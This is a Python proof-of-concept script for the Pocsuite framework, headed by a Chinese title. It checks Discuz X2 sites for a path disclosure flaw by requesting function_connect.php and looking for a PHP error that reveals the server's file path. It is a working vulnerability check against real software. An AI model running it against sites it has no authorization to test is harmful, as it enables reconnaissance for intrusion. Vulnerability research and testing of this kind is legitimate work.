Discuz x2 source/function/function_connect.php 泄漏服务器物理路径

                                                #!/usr/bin/env python
# -*- coding: utf-8 -*-

from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register
from pocsuite.lib.utils.password import getWeakPassword
from pocsuite.lib.utils.password import getLargeWeakPassword
import re


class TestPOC(POCBase):
    vulID = '24254'  # ssvid
    version = '1'
    author = 'do9gy'
    vulDate = '2011-11-25'
    createDate = '2015-09-29'
    updateDate = '2015-09-29'
    references = ['http://old.sebug.net/vuldb/ssvid-24254']
    name = 'Discuz function_connect.php Path Disclosure vulnerability'
    appPowerLink = 'http://www.discuz.com/'
    appName = 'discuz'
    appVersion = 'discuz x2.0'
    vulType = 'Path Disclosure'
    desc = '''
       Discuz function_connect.php Path Disclosure vulnerability
    '''
    samples = ['']

    def _attack(self):
        return self._verify() 

    def _verify(self, verify=True):
        result = {}
        vul_url = '%s/source/function/function_connect.php' % self.url
        payload = {
            'exp':''
               }

        response = req.get(vul_url+payload['exp'])
        m = re.match(r'[\s\S]*Call to undefined function',response.text)
        if m:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)